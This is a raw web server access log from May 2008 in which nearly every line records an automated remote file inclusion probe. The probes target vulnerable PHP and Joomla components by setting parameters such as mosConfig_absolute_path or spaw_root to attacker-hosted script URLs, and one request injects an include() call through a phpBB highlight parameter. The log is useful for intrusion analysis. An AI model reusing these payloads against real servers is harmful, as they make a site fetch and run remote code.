194.126.239.14 - - [16/May/2008:11:21:24 -0700] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:21:24 -0700] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.107.233 - - [16/May/2008:11:21:29 -0700] "GET //ubbthreads//addpost_newpoll.php?addpoll=preview&thispath=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
211.234.107.233 - - [16/May/2008:11:21:29 -0700] "GET /logs//ubbthreads//addpost_newpoll.php?addpoll=preview&thispath=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:21:31 -0700] "GET /logs/access.log//language.inc.php?langs_dir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:21:31 -0700] "GET //language.inc.php?langs_dir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:21:31 -0700] "GET /logs//language.inc.php?langs_dir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:21:33 -0700] "GET /logs/access_080102.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:21:34 -0700] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:21:34 -0700] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:21:44 -0700] "GET /logs/access_071220.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.217.194 - - [16/May/2008:11:21:50 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.217.194 - - [16/May/2008:11:21:50 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:21:52 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:21:53 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:22:25 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:22:25 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:22:25 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:22:49 -0700] "GET /logs/access_080302.log//admin/business_inc/saveserver.php?thisdir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:22:49 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:22:49 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:22:50 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:23:06 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:23:08 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:23:09 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:23:09 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:23:10 -0700] "GET /logs/access_071220.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:23:21 -0700] "GET /logs/access_071216.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:11:23:22 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:11:23:22 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:23:22 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:11:23:23 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:23:25 -0700] "GET /logs/access_071221.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:23:44 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:23:45 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:23:45 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:23:49 -0700] "GET /logs/access_080302.log//admin/business_inc/saveserver.php?thisdir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:11:24:03 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:11:24:09 -0700] "GET /logs/modifyform.html?code=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:11:24:10 -0700] "GET /modifyform.html?code=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:11:24:10 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:24:28 -0700] "GET /logs/access_080119.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:24:57 -0700] "GET /logs/access_080124.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:25:03 -0700] "GET /logs/access_071212.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:11:25:04 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:25:19 -0700] "GET /logs/access_080125.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.84.31 - - [16/May/2008:11:25:21 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:25:21 -0700] "GET /logs/access_071116.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.84.31 - - [16/May/2008:11:25:29 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:25:33 -0700] "GET /logs/access_071218.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:25:51 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:25:52 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:25:52 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:25:52 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:25:53 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:25:53 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:26:11 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:26:16 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.223.101.14 - - [16/May/2008:11:26:23 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hostings.fileave.com/neang22.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.27.154 - - [16/May/2008:11:26:26 -0700] "GET /logs/access_080425.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:26:48 -0700] "GET /logs//language.inc.php?langs_dir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:26:49 -0700] "GET //language.inc.php?langs_dir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:11:26:56 -0700] "GET /logs//update/update1.php?lang=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:11:26:57 -0700] "GET //update/update1.php?lang=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [16/May/2008:11:27:03 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [16/May/2008:11:27:03 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:27:05 -0700] "GET /logs/access_080130.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.190.22.52 - - [16/May/2008:11:27:20 -0700] "GET /errors.php?error=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.190.22.52 - - [16/May/2008:11:27:24 -0700] "GET /logs/errors.php?error=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:11:28:09 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:11:28:12 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:11:28:12 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:11:28:15 -0700] "GET /logs//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 47704 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:11:28:20 -0700] "GET //?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:28:22 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.806" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:28:28 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:28:33 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:28:33 -0700] "GET /modifyform.html?code=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:28:34 -0700] "GET /logs/modifyform.html?code=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.55.6.34 - - [16/May/2008:11:28:38 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [16/May/2008:11:28:38 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:28:39 -0700] "GET /logs/access_071202.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:29:03 -0700] "GET /logs/access_071225.log/modifyform.html?code=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.230.148.249 - - [16/May/2008:11:29:30 -0700] "GET /index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 200 11607 "-" "libwww-perl/5.79" "www.dmulk.com"
211.230.148.249 - - [16/May/2008:11:29:30 -0700] "GET /index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 200 11607 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:29:35 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:11:29:36 -0700] "GET /logs/access_080120.log//akocomments.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:11:29:37 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:11:29:39 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:29:57 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:29:57 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:30:05 -0700] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:11:30:27 -0700] "GET /logs//popup_window.php?site_isp_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:11:30:28 -0700] "GET //popup_window.php?site_isp_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [16/May/2008:11:30:32 -0700] "GET /logs/access_080421.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [16/May/2008:11:30:32 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [16/May/2008:11:30:32 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:11:30:35 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:11:30:36 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:11:30:37 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.230.148.249 - - [16/May/2008:11:30:43 -0700] "GET /logs/access_071214.log/index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.230.148.249 - - [16/May/2008:11:30:46 -0700] "GET /logs/access_071214.log/index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.230.148.249 - - [16/May/2008:11:30:48 -0700] "GET /index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.230.148.249 - - [16/May/2008:11:30:49 -0700] "GET /logs/index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.217.194 - - [16/May/2008:11:30:50 -0700] "GET /logs//popup_window.php?site_isp_root=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.217.194 - - [16/May/2008:11:30:50 -0700] "GET //popup_window.php?site_isp_root=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.230.148.249 - - [16/May/2008:11:30:52 -0700] "GET /logs/index.php?option=com_newsfeeds&mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
